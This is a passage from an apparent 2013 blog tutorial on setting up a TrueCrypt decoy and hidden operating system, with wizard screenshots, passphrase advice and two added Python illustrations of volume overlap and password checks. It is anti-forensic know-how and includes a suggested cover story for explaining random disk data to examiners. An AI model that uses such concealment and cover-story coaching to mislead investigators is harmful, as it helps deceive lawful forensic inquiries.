sense to have a second partition just sitting there with random ones and
zeros. The inner volume on the second partition <b>can </b>be plausibly
denied because the outer volume on the second partition is a plausible
explanation for the random ones and zeros on the second partition.
Getting confused? Read this paragraph 3 times slowly. ;)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The
way this all works is that the inner volume on Partition 2 uses the
free space of the outer volume on Partition 2. Genius, huh? However,
this means that if you write too many files onto the outer volume you
could corrupt the inner volume. Once you get everything set up, TrueCrypt
has a handy checkbox for protecting the inner volume when mounting. For
now though, you need to read the dialog carefully and take note of the
space limits. (This will be covered more in Part 4.) Then
click Open Outer Volume and create/copy your decoy flat files. Leave the
TrueCrypt wizard open while you do this. Return to the wizard when you
are done and click Next.</div>
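As an added illustration (not TrueCrypt's code, and not from this post), here is a simplified model of that relationship: a constructed outer volume whose tail is secretly occupied by the inner volume, and the effect of the mount-time "protect hidden volume" option on writes that run past the safe space limit. The sizes, offsets and the switch to read-only after protection trips are part of this model, not the real on-disk format.

```python
"""Simplified model of the outer/inner volume relationship explained above.

Added illustration for this post; it is not TrueCrypt's code and the numbers
are constructed sample values. The real on-disk format (volume headers,
sector alignment, the exact placement of the hidden volume) is not modelled.
"""
from dataclasses import dataclass, field


@dataclass
class OuterVolume:
    """An outer volume whose tail region is secretly occupied by the hidden volume."""
    size: int                 # usable bytes of the outer volume
    hidden_size: int          # bytes at the end of it that hold the hidden volume
    protect_hidden: bool      # the mount-time 'protect hidden volume' checkbox
    read_only: bool = False   # set once protection has tripped (model behaviour)
    log: list = field(default_factory=list)

    def __post_init__(self):
        if not 0 < self.hidden_size < self.size:
            raise ValueError("hidden volume must fit inside the outer volume")

    @property
    def hidden_start(self) -> int:
        # The hidden volume lives in what the outer filesystem sees as free
        # space at the end of the volume; the outer filesystem knows nothing
        # about it and will happily allocate files there.
        return self.size - self.hidden_size

    @property
    def safe_capacity(self) -> int:
        # How many bytes of decoy files the outer volume can hold without
        # touching the hidden volume: the 'space limit' the wizard shows.
        return self.hidden_start

    def write(self, offset: int, length: int) -> str:
        """Attempt a write of `length` bytes at `offset` and report what happened.

        Returns 'ok', 'blocked' (protection refused the write and, in this
        model, put the outer volume into read-only mode for the rest of the
        session), or 'corrupted' (no protection: hidden volume data was
        overwritten without any warning).
        """
        if offset < 0 or length <= 0 or offset + length > self.size:
            raise ValueError("write outside the outer volume")
        if self.read_only:
            return "blocked"
        overlaps_hidden = offset + length > self.hidden_start
        if overlaps_hidden and self.protect_hidden:
            self.read_only = True
            self.log.append(("blocked", offset, length))
            return "blocked"
        self.log.append(("write", offset, length))
        return "corrupted" if overlaps_hidden else "ok"


def simulate(protect: bool) -> list:
    """Copy decoy files onto a constructed 1 GiB outer volume holding a
    600 MiB hidden volume: first inside the safe capacity, then past it."""
    mib = 1024 * 1024
    vol = OuterVolume(size=1024 * mib, hidden_size=600 * mib, protect_hidden=protect)
    results = []
    # 300 MiB of decoy files, well inside safe_capacity (424 MiB).
    results.append(vol.write(0, 300 * mib))
    # A 200 MiB file whose tail crosses into the hidden volume's region.
    results.append(vol.write(300 * mib, 200 * mib))
    # A later small write: refused once protection tripped, otherwise fine.
    results.append(vol.write(50 * mib, 10 * mib))
    return results


if __name__ == "__main__":
    print("protected:  ", simulate(True))    # ['ok', 'blocked', 'blocked']
    print("unprotected:", simulate(False))   # ['ok', 'corrupted', 'ok']
```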
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i>NOTE:
What about a data forensics expert noticing that the free space on the
outer volume of the second partition contains random ones and zeros
instead of, say, being zeroed out? The hidden operating system is still plausibly deniable because the
claim could be made by the victim that at one point they shredded data
in that location with a software tool that overwrites with random bits,
per common practice. Thus, random bits were left on that volume.</i></span> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh22xZkxoGGzkTOaV6YvyxCMd1oGIhqMsFoGxgR8i6uiEji7Nf4njLpco7sKL22w8WFbMfTPRtXxRPR-CzK5byzin467D7sQ6Ma90BGPH5WOOkuaYV66hVXsICq9_rkD-k_YC4TIZCG0WE/s1600/017.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh22xZkxoGGzkTOaV6YvyxCMd1oGIhqMsFoGxgR8i6uiEji7Nf4njLpco7sKL22w8WFbMfTPRtXxRPR-CzK5byzin467D7sQ6Ma90BGPH5WOOkuaYV66hVXsICq9_rkD-k_YC4TIZCG0WE/s400/017.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ We've completed the outer volume on the second partition and placed
decoy files in it. Now it's time to create the inner volume on the
second partition and copy the operating system from Partition 1 to the
inner volume of Partition 2. Click Next here:<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5kEBiuBZ5bnbL6Wl6l2_bmUFJMV6D9GH-NOxdlwsGzgqXjV0foCG3wDYJ8qLSCd5sFIsAHu-yjgR-kN5VcZWukZWqMG4aMsV-lcRHyfpYKWUs8ZhtdRzeBEkxWceLlMB1iAvZZqz6nZc/s1600/018.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5kEBiuBZ5bnbL6Wl6l2_bmUFJMV6D9GH-NOxdlwsGzgqXjV0foCG3wDYJ8qLSCd5sFIsAHu-yjgR-kN5VcZWukZWqMG4aMsV-lcRHyfpYKWUs8ZhtdRzeBEkxWceLlMB1iAvZZqz6nZc/s400/018.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~<span style="color: red;">Make
sure you write down what algorithm you use in the next steps!</span> (Wasn't
important for previous steps.) The decoy operating system on Partition 1
<b>must </b>use
the same encryption algorithm as the hidden operating system on the
inner volume of Partition 2. This is because there is a different
TrueCrypt bootloader for each encryption algorithm.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirjIswoiYFsW4RBpkRddFdBWwy893oyIl2RYklwmZ3-bTEd3l-RDZzddn1pqVQN2CvKNNhZYfTebw_CS22SSfRg9q1aySPtmzPmqzmLkPr025vnELCju-k6YAEy5Snh3yboY71X36nAt4/s1600/019.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirjIswoiYFsW4RBpkRddFdBWwy893oyIl2RYklwmZ3-bTEd3l-RDZzddn1pqVQN2CvKNNhZYfTebw_CS22SSfRg9q1aySPtmzPmqzmLkPr025vnELCju-k6YAEy5Snh3yboY71X36nAt4/s400/019.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Going with the default encryption algorithms should be fine, just remember which one you used!!:</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPWssHMMYzbx537AaeBZlG1LfDNyB12JyhjYtfOa1cDJ3ZmX1UaDW_VbVVUJ6pYW3MhKHEbKl-DXWdebbS5QpU2b2_l1l1UYl4vpMziKeDf8nqFiSDF77PbsmSIbSIXTaXlgNywADy1Eg/s1600/enc-options.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPWssHMMYzbx537AaeBZlG1LfDNyB12JyhjYtfOa1cDJ3ZmX1UaDW_VbVVUJ6pYW3MhKHEbKl-DXWdebbS5QpU2b2_l1l1UYl4vpMziKeDf8nqFiSDF77PbsmSIbSIXTaXlgNywADy1Eg/s320/enc-options.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9OysosNz339GBNceoFNJOYDKSkGZa60xdDhCdMYs_L-ImailazvlnH56pEpK3XNjJYW0qK__gSkzpoVtSWoHnR38QRSPOIcvBKy2Ybpe5uaZwnRxxlUD0-FHjG-dYygAT0yuVPUPEyMs/s1600/042.jpg" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Remember,
this whole setup is pointless if you don't use a Fort Knox kinda
password. For all three passwords, consider using a passphrase that is
at least 20 characters long and contains uppercase, lowercase, numerals
and symbols. Don't take hours and hours setting up a hidden operating
system and then use the name of your dog in h4x0R. Please. Also, don't
use similar passwords for Password A, Password B and Password C.
Otherwise, if an adversary suspects a hidden operating system and you
have already given them Password A and Password C, they may be able to
derive Password B.</div>
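To make that advice concrete, here is an added check (example code, not TrueCrypt's and not from this post) that applies the rules above to Passwords A, B and C: length, the four character classes, and that no two of them are close enough that one could be derived from another. The 0.5 similarity cut-off and the sample passphrases are constructed values.

```python
"""Checks for the passphrase advice above: at least 20 characters, uppercase,
lowercase, numerals and symbols, and Passwords A, B and C not resembling
one another. Added illustration for this post, not TrueCrypt code."""
import string
from itertools import combinations

MIN_LENGTH = 20
MAX_SIMILARITY = 0.5  # assumed cut-off: above this, two passphrases are 'similar'


def check_passphrase(pw: str) -> list:
    """Return the policy violations for one passphrase (empty list = OK)."""
    problems = []
    if len(pw) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    classes = {
        "uppercase": any(c.isupper() for c in pw),
        "lowercase": any(c.islower() for c in pw),
        "numeral": any(c.isdigit() for c in pw),
        "symbol": any(c in string.punctuation for c in pw),
    }
    problems.extend(f"no {name}" for name, present in classes.items() if not present)
    return problems


def levenshtein(a: str, b: str) -> int:
    """Edit distance: single-character insertions, deletions or substitutions
    needed to turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def similarity(a: str, b: str) -> float:
    """1.0 for identical strings, 0.0 for strings sharing nothing.
    Case-insensitive, so 'Dog2013' and 'dog2013' count as the same."""
    a, b = a.lower(), b.lower()
    longest = max(len(a), len(b))
    if longest == 0:
        return 1.0
    return 1.0 - levenshtein(a, b) / longest


def check_password_set(passwords: dict) -> list:
    """Check a dict like {'A': ..., 'B': ..., 'C': ...}.

    Returns human-readable findings; an empty list means every passphrase
    meets the policy and no pair is close enough that knowing one of them
    (say A and C, handed over under coercion) helps guess another (B).
    """
    findings = []
    for label, pw in passwords.items():
        findings.extend(f"Password {label}: {p}" for p in check_passphrase(pw))
    for (la, pa), (lb, pb) in combinations(passwords.items(), 2):
        s = similarity(pa, pb)
        if s > MAX_SIMILARITY:
            findings.append(f"Password {la} and Password {lb} are {s:.0%} similar")
    return findings


if __name__ == "__main__":
    # Constructed samples for illustration only.
    weak_set = {
        "A": "Correct-Horse7-Battery-Staple!",
        "B": "Fluffy-The-Dog-2013!!!A",   # 'name of your dog in h4x0R', twice
        "C": "Fluffy-The-Dog-2013!!!C",
    }
    for finding in check_password_set(weak_set):
        print(finding)   # Password B and Password C are 96% similar
```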
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSOxOlXGRiIMLZ-AImRf_hmVARyG86Bi1Llv_5sOv9W3dpZH2vBUp21srckG58mUDOCWGOXv3zLFq3RkchdpdmG4VKg538mxwrDOm91a_0fqCiFkqzDw_gB72vy3lKfYLk9tR1MS4ZwfE/s1600/020.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSOxOlXGRiIMLZ-AImRf_hmVARyG86Bi1Llv_5sOv9W3dpZH2vBUp21srckG58mUDOCWGOXv3zLFq3RkchdpdmG4VKg538mxwrDOm91a_0fqCiFkqzDw_gB72vy3lKfYLk9tR1MS4ZwfE/s400/020.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
~Oh,
and please don't write this on a Post-it note and put it on your wall
or under your keyboard. Sigh. If you are going to use spy-level
technology, you are going to have to be a good spy. This means being a good memorizer. :) ...Enter <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s1600/TC_boot2.png" target="_blank">Password B</a>:<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheC1xFKvPLNWXBZgyi3wVfQFfiMKegbBMSfpC7rJiFqMBO76XQfDRT0TkELcFQ7skXNEYLpxAksCnIlR3LqvWH38xfdLgBBscnjAU4qD13nY4JdsgSVbizuAjAfPBiS9w2hzcz9-LoBgI/s1600/021.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheC1xFKvPLNWXBZgyi3wVfQFfiMKegbBMSfpC7rJiFqMBO76XQfDRT0TkELcFQ7skXNEYLpxAksCnIlR3LqvWH38xfdLgBBscnjAU4qD13nY4JdsgSVbizuAjAfPBiS9w2hzcz9-LoBgI/s400/021.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Time
for some mouse fun! TrueCrypt uses your mouse movements within this
dialog as extra randomness when generating the encryption keys, which increases the strength of the encryption. Draw some stick
figures. Pretend you are a post modern painter gone wild with their
brush. How long? Oh, maybe 2 minutes? Up to you...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBHTADjfaBbVsec13FOvfO1F9U-JO33QNOJRoQhpB0mxdlvW5Sc57C8jNcl5dxg1OIUwnCsOuvrKgYfoCfEjH-QzUs3TiWjpwLd4EETmyAiJZKJOhNhxNP2nEqmFwA4PwgCbuDmDzD78w/s1600/022.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBHTADjfaBbVsec13FOvfO1F9U-JO33QNOJRoQhpB0mxdlvW5Sc57C8jNcl5dxg1OIUwnCsOuvrKgYfoCfEjH-QzUs3TiWjpwLd4EETmyAiJZKJOhNhxNP2nEqmFwA4PwgCbuDmDzD78w/s400/022.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Okay, the encrypted inner volume on Partition 2 has been created:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirxFEoJ-K0ilVIPMHFjUF1ihhqFcX7kSTQb_2IHIiKHj-sIzHUHufH8OrFhSfdj9-AbnhpLXuQqiujR9PYxpdSnkiTC-hkH9WU1UOP_fdZAu1OvS1XORuQ-VivBRBKj73ohuzRgc8rgBg/s1600/023.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirxFEoJ-K0ilVIPMHFjUF1ihhqFcX7kSTQb_2IHIiKHj-sIzHUHufH8OrFhSfdj9-AbnhpLXuQqiujR9PYxpdSnkiTC-hkH9WU1UOP_fdZAu1OvS1XORuQ-VivBRBKj73ohuzRgc8rgBg/s400/023.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Now
you need to copy the operating system from Partition 1 to the inner
volume of Partition 2. This is going to take place after a reboot from a
TrueCrypt live environment (not Windows). I don't recommend
interrupting it. Click Start.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBvPA2NZPwhBE5z33mwkGXmC2pnXNoMoXzprMHddPJ-F1aiX4pRnaSAzQZRBOF6G_KGWdVjn8glejqNcJwdqhhl0icayS741EiuH_t7Ndq1Sc39b4jX5ZgoybFzJCBQh70kidlWaAY4c8/s1600/024.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBvPA2NZPwhBE5z33mwkGXmC2pnXNoMoXzprMHddPJ-F1aiX4pRnaSAzQZRBOF6G_KGWdVjn8glejqNcJwdqhhl0icayS741EiuH_t7Ndq1Sc39b4jX5ZgoybFzJCBQh70kidlWaAY4c8/s400/024.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Click Yes. </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU6sDbkrgWhfgaTf9eLJIT33MjWOGicyrKMKPx7niQAhKjlXgqeyaPPk9OymdqWasphHaJpy-JlWn4C0-GkzyVRgZYiE2vHDWZrd6M9VTSWMyztlXkC9L1d_t0llEo2Ct8Tcihaj3ogUI/s1600/025.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU6sDbkrgWhfgaTf9eLJIT33MjWOGicyrKMKPx7niQAhKjlXgqeyaPPk9OymdqWasphHaJpy-JlWn4C0-GkzyVRgZYiE2vHDWZrd6M9VTSWMyztlXkC9L1d_t0llEo2Ct8Tcihaj3ogUI/s400/025.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Enter Password B: </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQrhwEnZ2z5YLH5jxCMl65D_aFIn_xT3pWyyHGO1uOyHW6fQgrZnJeqVigJhXNWpjgpZlUa5l2aJVoQLj8Zu3jhIHCtQpbZqzHO-4ZG4b_KbGYNLycdeG7ym1wmzSfoIUs_8QVIK-fgZM/s1600/026.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQrhwEnZ2z5YLH5jxCMl65D_aFIn_xT3pWyyHGO1uOyHW6fQgrZnJeqVigJhXNWpjgpZlUa5l2aJVoQLj8Zu3jhIHCtQpbZqzHO-4ZG4b_KbGYNLycdeG7ym1wmzSfoIUs_8QVIK-fgZM/s400/026.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Go do a little yard work or something: </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMoQmy7qmHsfGz9ZS56VNUs2Qoo8K02jkdBxlkSvARgLUZP3iA_XZc57vjBp9H1-ZQSoASqa8YQ_B_P8CC0SHmCfWibcMof7hh2lpOSOPT8W835jRKxaviyUdpKxum_CMmTJHk5CSuRfU/s1600/027.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMoQmy7qmHsfGz9ZS56VNUs2Qoo8K02jkdBxlkSvARgLUZP3iA_XZc57vjBp9H1-ZQSoASqa8YQ_B_P8CC0SHmCfWibcMof7hh2lpOSOPT8W835jRKxaviyUdpKxum_CMmTJHk5CSuRfU/s400/027.jpg" width="400" /></a></div>
<br />
~Cool! It's done...Enter Password B: <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBfpwa5Leet2EzFtpxjyzfgYQdUF6K-wHEtHMNZBo8LCNzAUSCSrn0SH2GkvCSEtB_LWx7fg27VlmfBsaj2Rc-i6qEeXRt35O7b-HwKiVQ1lN82aAbdBu2ftreyNH8nhQ6N7nD8ErioS4/s1600/028.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBfpwa5Leet2EzFtpxjyzfgYQdUF6K-wHEtHMNZBo8LCNzAUSCSrn0SH2GkvCSEtB_LWx7fg27VlmfBsaj2Rc-i6qEeXRt35O7b-HwKiVQ1lN82aAbdBu2ftreyNH8nhQ6N7nD8ErioS4/s400/028.jpg" width="400" /></a></div>
<br />
<br />
~So
once you've booted into your hidden operating system, pull up Disk
Management and be freaked out. It looks like you are booted to Partition
1! You're not, don't worry. This is just the behavior of a TrueCrypt
hidden operating system. This next dialog explains further:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlB03sMmtsGUxDwWKM2VYOyAl-ybbB5bzETv-Jhd7ZNzPK-nIrrU-6KDeO08AybuvyqA9qoXxXBjjqrOAXr3joqLISw7QQwRS-81fdAaRmS1TaX9h5K96X8u7gFMH-6Nosm6yWvHJCXfQ/s1600/029.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlB03sMmtsGUxDwWKM2VYOyAl-ybbB5bzETv-Jhd7ZNzPK-nIrrU-6KDeO08AybuvyqA9qoXxXBjjqrOAXr3joqLISw7QQwRS-81fdAaRmS1TaX9h5K96X8u7gFMH-6Nosm6yWvHJCXfQ/s400/029.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~This
next huge dialog is basically reminding you that you can only write to
encrypted filesystems when booted to the hidden operating system.
Writing to unencrypted filesystems could give away the presence of the
hidden operating system by leaving traces in those filesystems. Down
at the bottom, it tells you how to securely transfer files from the
decoy operating system to the hidden operating system.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb0RHFCRExaIfddRKqmXWqjFbzx4cy6Ms9FLA7fZwttPDFadn-3MmaGx56EXMU-0OwKdMGMjsVDC4EWzaRpIJbLRUmGOx5-mkp_60hiVeMTU9exY-fSnLBUKBU2CDh5RHXyeGiUfWHvJo/s1600/030.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb0RHFCRExaIfddRKqmXWqjFbzx4cy6Ms9FLA7fZwttPDFadn-3MmaGx56EXMU-0OwKdMGMjsVDC4EWzaRpIJbLRUmGOx5-mkp_60hiVeMTU9exY-fSnLBUKBU2CDh5RHXyeGiUfWHvJo/s400/030.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After
you click OK on the window above, the next dialog guides you through
tasks for Partition 1. Hang tight and continue onto Part 3 for that by clicking here.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-3.html"> Click here to go to Part 3 - Setup your first partition</a><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Links to each section:<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part.html" target="">Part 1</a> - (Un)boring intro with all the snazzy info<br />
Part 2 - Setup your second partition -- you are here<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-3.html">Part 3</a> - Setup your first partition (sounds backwards, I know)<br />
Part 4 - Other cool stuff -- COMING SOON<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
Unknown noreply@blogger.com 0
tag:blogger.com,1999:blog-3627429161857795589.post-9045200032031787534 2013-09-05T21:38:00.002-05:00 2013-09-07T22:54:15.429-05:00
Plausible deniability of a hidden OS - Part 1<div>
So just in case you are like a spy or just extremely paranoid,
I've got a post for you on how to create a system with TrueCrypt (free)
that <i>dual boots</i> between an encrypted <i>decoy</i> Windows operating system and an encrypted <i>hidden</i> Windows
operating system. Such a hidden system in theory cannot even be proven to exist by the
best computer forensics investigation techniques in use at the time of
this post. By employing this particular type of encryption, one can
potentially achieve plausible deniability in regards to the presence of a hidden
operating system.</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://imgs.xkcd.com/comics/security.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="http://imgs.xkcd.com/comics/security.png" width="400" /></a> </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Now if you want to find a quick tutorial online on how to do this,
Google will serve you well. There are quite a few. But if you want to fully understand the anatomy and architecture of
this technology and a full explanation of the many confusing
dialog boxes you will encounter during your adventure, this is the
place for you. I will strive to explain in detail while still keeping
things as straightforward and simple as possible.</div>
<div>
<br />
This will be in four parts:<br />
Part 1 - (Un)boring intro with all the snazzy info -- you're reading this now!<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-2.html">Part 2</a> - Setup your second partition<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-3.html">Part 3</a> - Setup your first partition (sounds backwards, I know)<br />
Part 4 - Other cool stuff -- COMING SOON<br />
<br /></div>
<div>
So why use a hidden operating system or why even use encryption at all? Well, let's look at your choices...<br />
<br />
<b>1. No encryption at all:</b>
Not good. Anybody can boot your computer into a Linux live CD like
Knoppix or whatever and view all your flat files to their heart's
content. If your laptop is stolen or lost, you are toast.<br />
<br />
<b>2. Encrypt a volume:</b>
You can encrypt a volume on your computer with something like
TrueCrypt. This amounts to a file being created which is actually an
encrypted container for your files. This will protect only the files you
put into it. The container is mounted by simply opening the TrueCrypt
application, mounting the container file and providing the password. Without the
password, no one can see your stuff.<br />
<br />
<b>3. Encrypt a hidden volume:</b>
When setting up #2 (above), you can additionally set up <a href="http://www.truecrypt.org/docs/hidden-volume" target="_blank">an encrypted hidden volume</a> inside the normal encrypted outer volume.
Although someone could forensically deduce that the outer volume exists
and potentially force you to reveal the password, they would not be able
to tell that there was a hidden volume inside of it. Even if they were
familiar with this technology and suspected that there was a hidden
volume, in theory they would not be able to prove forensically that it
existed and you could plausibly deny its existence. When mounting the
volume, you can use one of 2 passwords: using one mounts the normal
outer volume; using the other mounts the hidden volume.<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgqPmslDoRDRfu-oqDssWYwzn8h6xHZAAHL54aVCDUGKD-93Y9dEeLWc97w3zVke8W4IX8QGDlIBvjEd_TigwDe0lrP7roagMFlYMFAwhYjJ0XxnRrGKECcs4P55z6YnX1QZiXxIGo6VY/s1600/074.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgqPmslDoRDRfu-oqDssWYwzn8h6xHZAAHL54aVCDUGKD-93Y9dEeLWc97w3zVke8W4IX8QGDlIBvjEd_TigwDe0lrP7roagMFlYMFAwhYjJ0XxnRrGKECcs4P55z6YnX1QZiXxIGo6VY/s400/074.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">A custom fake boot error which is really a TrueCrypt password prompt</td></tr>
</tbody></table>
<br />
<b>4. Encrypt the operating system partition:</b><br />
This
involves encrypting your entire Windows installation so that a password
is required in order to even boot. If someone removes your hard drive
and slaves it into their computer or boots your computer to a live CD,
they will still not be able to recover your data because it is
encrypted. When you boot your computer, a boot loader will come up and
ask for the password before you can boot into Windows. Also, the
bootloader password prompt can be hidden or a fake error can be
displayed in its place if you really wanna go paranoid. For added
security/paranoia, some even prefer to copy the TrueCrypt bootloader to
external media and then securely wipe it from the hard drive so that
even the best analyst might not be able to prove that there was any encryption in
place at all, even if they suspected it. In this case, the external
media would contain the bootloader but the hard drive itself would
contain no definitive evidence of encryption. A forensic analysis in
that situation would simply show random bits on the disk. That last
